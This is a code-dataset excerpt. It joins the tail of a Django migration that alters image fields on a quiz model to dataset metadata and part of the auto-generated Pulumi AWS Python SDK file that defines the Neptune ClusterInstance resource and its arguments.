    field definition (blank allowed, byte-string default, 'photos' upload
    directory), so the AlterField operations are built in a comprehension
    rather than spelled out seven times.
    """

    dependencies = [
        ('polls', '0002_auto_20171129_1139'),
    ]

    operations = [
        migrations.AlterField(
            model_name='mcq',
            name=column,
            # Byte-string defaults are preserved exactly as the Django 1.11
            # generator emitted them.
            field=models.ImageField(blank=True, default=b'no image', upload_to=b'photos'),
        )
        for column in (
            'optionA_image',
            'optionB_image',
            'optionC_image',
            'optionD_image',
            'optionE_image',
            'question_diagram',
            'question_text_image',
        )
    ]
| 33.019608
| 90
| 0.584323
| 185
| 1,684
| 5.156757
| 0.286486
| 0.146751
| 0.183438
| 0.212788
| 0.752621
| 0.752621
| 0.714885
| 0.714885
| 0.714885
| 0.714885
| 0
| 0.027477
| 0.286817
| 1,684
| 50
| 91
| 33.68
| 0.766861
| 0.04038
| 0
| 0.651163
| 1
| 0
| 0.153131
| 0.014259
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.046512
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7d3bbbfd8bd11a96c8ed6529adcabeaad5a5b93
| 57,611
|
py
|
Python
|
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/neptune/cluster_instance.py
|
aamir-locus/pulumi-aws
|
3e234b050129bde35d8e072a88bd608562f02142
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ClusterInstanceArgs', 'ClusterInstance']
@pulumi.input_type
class ClusterInstanceArgs:
    # NOTE: this class is emitted by the Pulumi Terraform Bridge (tfgen);
    # keep edits to comments only and regenerate for logic changes.
    def __init__(__self__, *,
                 cluster_identifier: pulumi.Input[str],
                 instance_class: pulumi.Input[str],
                 apply_immediately: Optional[pulumi.Input[bool]] = None,
                 auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
                 availability_zone: Optional[pulumi.Input[str]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 identifier: Optional[pulumi.Input[str]] = None,
                 identifier_prefix: Optional[pulumi.Input[str]] = None,
                 neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
                 neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 preferred_backup_window: Optional[pulumi.Input[str]] = None,
                 preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
                 promotion_tier: Optional[pulumi.Input[int]] = None,
                 publicly_accessible: Optional[pulumi.Input[bool]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a ClusterInstance resource.
        :param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
        :param pulumi.Input[str] instance_class: The instance class to use.
        :param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
               are applied immediately, or during the next maintenance window. Default is`false`.
        :param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
        :param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
        :param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
        :param pulumi.Input[str] engine_version: The neptune engine version.
        :param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
        :param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
        :param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
        :param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
        :param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
        :param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
        :param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
               Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
        :param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
        :param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
        """
        # Required arguments are always recorded; each optional argument is
        # recorded only when supplied, so an omitted value is absent from the
        # input map rather than stored as None.
        pulumi.set(__self__, "cluster_identifier", cluster_identifier)
        pulumi.set(__self__, "instance_class", instance_class)
        if apply_immediately is not None:
            pulumi.set(__self__, "apply_immediately", apply_immediately)
        if auto_minor_version_upgrade is not None:
            pulumi.set(__self__, "auto_minor_version_upgrade", auto_minor_version_upgrade)
        if availability_zone is not None:
            pulumi.set(__self__, "availability_zone", availability_zone)
        if engine is not None:
            pulumi.set(__self__, "engine", engine)
        if engine_version is not None:
            pulumi.set(__self__, "engine_version", engine_version)
        if identifier is not None:
            pulumi.set(__self__, "identifier", identifier)
        if identifier_prefix is not None:
            pulumi.set(__self__, "identifier_prefix", identifier_prefix)
        if neptune_parameter_group_name is not None:
            pulumi.set(__self__, "neptune_parameter_group_name", neptune_parameter_group_name)
        if neptune_subnet_group_name is not None:
            pulumi.set(__self__, "neptune_subnet_group_name", neptune_subnet_group_name)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if preferred_backup_window is not None:
            pulumi.set(__self__, "preferred_backup_window", preferred_backup_window)
        if preferred_maintenance_window is not None:
            pulumi.set(__self__, "preferred_maintenance_window", preferred_maintenance_window)
        if promotion_tier is not None:
            pulumi.set(__self__, "promotion_tier", promotion_tier)
        if publicly_accessible is not None:
            pulumi.set(__self__, "publicly_accessible", publicly_accessible)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    # Each property below maps a snake_case Python attribute onto the
    # camelCase wire name via @pulumi.getter/pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="clusterIdentifier")
    def cluster_identifier(self) -> pulumi.Input[str]:
        """
        The identifier of the `neptune.Cluster` in which to launch this instance.
        """
        return pulumi.get(self, "cluster_identifier")

    @cluster_identifier.setter
    def cluster_identifier(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_identifier", value)

    @property
    @pulumi.getter(name="instanceClass")
    def instance_class(self) -> pulumi.Input[str]:
        """
        The instance class to use.
        """
        return pulumi.get(self, "instance_class")

    @instance_class.setter
    def instance_class(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_class", value)

    @property
    @pulumi.getter(name="applyImmediately")
    def apply_immediately(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether any instance modifications
        are applied immediately, or during the next maintenance window. Default is`false`.
        """
        return pulumi.get(self, "apply_immediately")

    @apply_immediately.setter
    def apply_immediately(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "apply_immediately", value)

    @property
    @pulumi.getter(name="autoMinorVersionUpgrade")
    def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:
        """
        Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
        """
        return pulumi.get(self, "auto_minor_version_upgrade")

    @auto_minor_version_upgrade.setter
    def auto_minor_version_upgrade(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_minor_version_upgrade", value)

    @property
    @pulumi.getter(name="availabilityZone")
    def availability_zone(self) -> Optional[pulumi.Input[str]]:
        """
        The EC2 Availability Zone that the neptune instance is created in.
        """
        return pulumi.get(self, "availability_zone")

    @availability_zone.setter
    def availability_zone(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "availability_zone", value)

    @property
    @pulumi.getter
    def engine(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
        """
        return pulumi.get(self, "engine")

    @engine.setter
    def engine(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine", value)

    @property
    @pulumi.getter(name="engineVersion")
    def engine_version(self) -> Optional[pulumi.Input[str]]:
        """
        The neptune engine version.
        """
        return pulumi.get(self, "engine_version")

    @engine_version.setter
    def engine_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine_version", value)

    @property
    @pulumi.getter
    def identifier(self) -> Optional[pulumi.Input[str]]:
        """
        The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
        """
        return pulumi.get(self, "identifier")

    @identifier.setter
    def identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identifier", value)

    @property
    @pulumi.getter(name="identifierPrefix")
    def identifier_prefix(self) -> Optional[pulumi.Input[str]]:
        """
        Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
        """
        return pulumi.get(self, "identifier_prefix")

    @identifier_prefix.setter
    def identifier_prefix(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "identifier_prefix", value)

    @property
    @pulumi.getter(name="neptuneParameterGroupName")
    def neptune_parameter_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the neptune parameter group to associate with this instance.
        """
        return pulumi.get(self, "neptune_parameter_group_name")

    @neptune_parameter_group_name.setter
    def neptune_parameter_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "neptune_parameter_group_name", value)

    @property
    @pulumi.getter(name="neptuneSubnetGroupName")
    def neptune_subnet_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
        """
        return pulumi.get(self, "neptune_subnet_group_name")

    @neptune_subnet_group_name.setter
    def neptune_subnet_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "neptune_subnet_group_name", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        The port on which the DB accepts connections. Defaults to `8182`.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="preferredBackupWindow")
    def preferred_backup_window(self) -> Optional[pulumi.Input[str]]:
        """
        The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
        """
        return pulumi.get(self, "preferred_backup_window")

    @preferred_backup_window.setter
    def preferred_backup_window(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "preferred_backup_window", value)

    @property
    @pulumi.getter(name="preferredMaintenanceWindow")
    def preferred_maintenance_window(self) -> Optional[pulumi.Input[str]]:
        """
        The window to perform maintenance in.
        Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
        """
        return pulumi.get(self, "preferred_maintenance_window")

    @preferred_maintenance_window.setter
    def preferred_maintenance_window(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "preferred_maintenance_window", value)

    @property
    @pulumi.getter(name="promotionTier")
    def promotion_tier(self) -> Optional[pulumi.Input[int]]:
        """
        Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
        """
        return pulumi.get(self, "promotion_tier")

    @promotion_tier.setter
    def promotion_tier(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "promotion_tier", value)

    @property
    @pulumi.getter(name="publiclyAccessible")
    def publicly_accessible(self) -> Optional[pulumi.Input[bool]]:
        """
        Bool to control if instance is publicly accessible. Default is `false`.
        """
        return pulumi.get(self, "publicly_accessible")

    @publicly_accessible.setter
    def publicly_accessible(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "publicly_accessible", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A map of tags to assign to the instance.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _ClusterInstanceState:
def __init__(__self__, *,
address: Optional[pulumi.Input[str]] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
arn: Optional[pulumi.Input[str]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
dbi_resource_id: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
kms_key_arn: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
writer: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering ClusterInstance resources.
:param pulumi.Input[str] address: The hostname of the instance. See also `endpoint` and `port`.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of neptune instance
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] dbi_resource_id: The region-unique, immutable identifier for the neptune instance.
:param pulumi.Input[str] endpoint: The connection endpoint in `address:port` format.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] kms_key_arn: The ARN for the KMS encryption key if one is set to the neptune cluster.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the neptune cluster is encrypted.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
:param pulumi.Input[bool] writer: Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
if address is not None:
pulumi.set(__self__, "address", address)
if apply_immediately is not None:
pulumi.set(__self__, "apply_immediately", apply_immediately)
if arn is not None:
pulumi.set(__self__, "arn", arn)
if auto_minor_version_upgrade is not None:
pulumi.set(__self__, "auto_minor_version_upgrade", auto_minor_version_upgrade)
if availability_zone is not None:
pulumi.set(__self__, "availability_zone", availability_zone)
if cluster_identifier is not None:
pulumi.set(__self__, "cluster_identifier", cluster_identifier)
if dbi_resource_id is not None:
pulumi.set(__self__, "dbi_resource_id", dbi_resource_id)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if engine_version is not None:
pulumi.set(__self__, "engine_version", engine_version)
if identifier is not None:
pulumi.set(__self__, "identifier", identifier)
if identifier_prefix is not None:
pulumi.set(__self__, "identifier_prefix", identifier_prefix)
if instance_class is not None:
pulumi.set(__self__, "instance_class", instance_class)
if kms_key_arn is not None:
pulumi.set(__self__, "kms_key_arn", kms_key_arn)
if neptune_parameter_group_name is not None:
pulumi.set(__self__, "neptune_parameter_group_name", neptune_parameter_group_name)
if neptune_subnet_group_name is not None:
pulumi.set(__self__, "neptune_subnet_group_name", neptune_subnet_group_name)
if port is not None:
pulumi.set(__self__, "port", port)
if preferred_backup_window is not None:
pulumi.set(__self__, "preferred_backup_window", preferred_backup_window)
if preferred_maintenance_window is not None:
pulumi.set(__self__, "preferred_maintenance_window", preferred_maintenance_window)
if promotion_tier is not None:
pulumi.set(__self__, "promotion_tier", promotion_tier)
if publicly_accessible is not None:
pulumi.set(__self__, "publicly_accessible", publicly_accessible)
if storage_encrypted is not None:
pulumi.set(__self__, "storage_encrypted", storage_encrypted)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if writer is not None:
pulumi.set(__self__, "writer", writer)
@property
@pulumi.getter
def address(self) -> Optional[pulumi.Input[str]]:
"""
The hostname of the instance. See also `endpoint` and `port`.
"""
return pulumi.get(self, "address")
@address.setter
def address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address", value)
@property
@pulumi.getter(name="applyImmediately")
def apply_immediately(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
"""
return pulumi.get(self, "apply_immediately")
@apply_immediately.setter
def apply_immediately(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "apply_immediately", value)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of neptune instance
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="autoMinorVersionUpgrade")
def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
"""
return pulumi.get(self, "auto_minor_version_upgrade")
@auto_minor_version_upgrade.setter
def auto_minor_version_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_minor_version_upgrade", value)
@property
@pulumi.getter(name="availabilityZone")
def availability_zone(self) -> Optional[pulumi.Input[str]]:
"""
The EC2 Availability Zone that the neptune instance is created in.
"""
return pulumi.get(self, "availability_zone")
@availability_zone.setter
def availability_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "availability_zone", value)
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the `neptune.Cluster` in which to launch this instance.
"""
return pulumi.get(self, "cluster_identifier")
@cluster_identifier.setter
def cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_identifier", value)
@property
@pulumi.getter(name="dbiResourceId")
def dbi_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The region-unique, immutable identifier for the neptune instance.
"""
return pulumi.get(self, "dbi_resource_id")
@dbi_resource_id.setter
def dbi_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dbi_resource_id", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The connection endpoint in `address:port` format.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> Optional[pulumi.Input[str]]:
"""
The neptune engine version.
"""
return pulumi.get(self, "engine_version")
@engine_version.setter
def engine_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_version", value)
@property
@pulumi.getter
def identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
"""
return pulumi.get(self, "identifier")
@identifier.setter
def identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier", value)
@property
@pulumi.getter(name="identifierPrefix")
def identifier_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
"""
return pulumi.get(self, "identifier_prefix")
@identifier_prefix.setter
def identifier_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier_prefix", value)
@property
@pulumi.getter(name="instanceClass")
def instance_class(self) -> Optional[pulumi.Input[str]]:
"""
The instance class to use.
"""
return pulumi.get(self, "instance_class")
@instance_class.setter
def instance_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_class", value)
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> Optional[pulumi.Input[str]]:
"""
The ARN for the KMS encryption key if one is set to the neptune cluster.
"""
return pulumi.get(self, "kms_key_arn")
@kms_key_arn.setter
def kms_key_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_arn", value)
@property
@pulumi.getter(name="neptuneParameterGroupName")
def neptune_parameter_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the neptune parameter group to associate with this instance.
"""
return pulumi.get(self, "neptune_parameter_group_name")
@neptune_parameter_group_name.setter
def neptune_parameter_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_parameter_group_name", value)
@property
@pulumi.getter(name="neptuneSubnetGroupName")
def neptune_subnet_group_name(self) -> Optional[pulumi.Input[str]]:
"""
A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
"""
return pulumi.get(self, "neptune_subnet_group_name")
@neptune_subnet_group_name.setter
def neptune_subnet_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_subnet_group_name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port on which the DB accepts connections. Defaults to `8182`.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="preferredBackupWindow")
def preferred_backup_window(self) -> Optional[pulumi.Input[str]]:
"""
The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
"""
return pulumi.get(self, "preferred_backup_window")
@preferred_backup_window.setter
def preferred_backup_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_backup_window", value)
@property
@pulumi.getter(name="preferredMaintenanceWindow")
def preferred_maintenance_window(self) -> Optional[pulumi.Input[str]]:
"""
The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
"""
return pulumi.get(self, "preferred_maintenance_window")
@preferred_maintenance_window.setter
def preferred_maintenance_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_maintenance_window", value)
    @property
    @pulumi.getter(name="promotionTier")
    def promotion_tier(self) -> Optional[pulumi.Input[int]]:
        """
        Default 0. Failover Priority setting on instance level. The reader with the lower tier has higher priority to get promoted to writer.
        """
        return pulumi.get(self, "promotion_tier")
    @promotion_tier.setter
    def promotion_tier(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "promotion_tier", value)
@property
@pulumi.getter(name="publiclyAccessible")
def publicly_accessible(self) -> Optional[pulumi.Input[bool]]:
"""
Bool to control if instance is publicly accessible. Default is `false`.
"""
return pulumi.get(self, "publicly_accessible")
@publicly_accessible.setter
def publicly_accessible(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "publicly_accessible", value)
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the neptune cluster is encrypted.
"""
return pulumi.get(self, "storage_encrypted")
@storage_encrypted.setter
def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "storage_encrypted", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the instance.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def writer(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
return pulumi.get(self, "writer")
@writer.setter
def writer(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "writer", value)
class ClusterInstance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
A Cluster Instance Resource defines attributes that are specific to a single instance in a Neptune Cluster.
You can simply add neptune instances and Neptune manages the replication. You can use the [count](https://www.terraform.io/docs/configuration/meta-arguments/count.html)
meta-parameter to make multiple instances and join them all to the same Neptune Cluster, or you may specify different Cluster Instance resources with various `instance_class` sizes.
## Example Usage
The following example will create a neptune cluster with two neptune instances(one writer and one reader).
```python
import pulumi
import pulumi_aws as aws
default = aws.neptune.Cluster("default",
cluster_identifier="neptune-cluster-demo",
engine="neptune",
backup_retention_period=5,
preferred_backup_window="07:00-09:00",
skip_final_snapshot=True,
iam_database_authentication_enabled=True,
apply_immediately=True)
example = []
for range in [{"value": i} for i in range(0, 2)]:
example.append(aws.neptune.ClusterInstance(f"example-{range['value']}",
cluster_identifier=default.id,
engine="neptune",
instance_class="db.r4.large",
apply_immediately=True))
```
## Import
`aws_neptune_cluster_instance` can be imported by using the instance identifier, e.g.
```sh
$ pulumi import aws:neptune/clusterInstance:ClusterInstance example my-instance
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
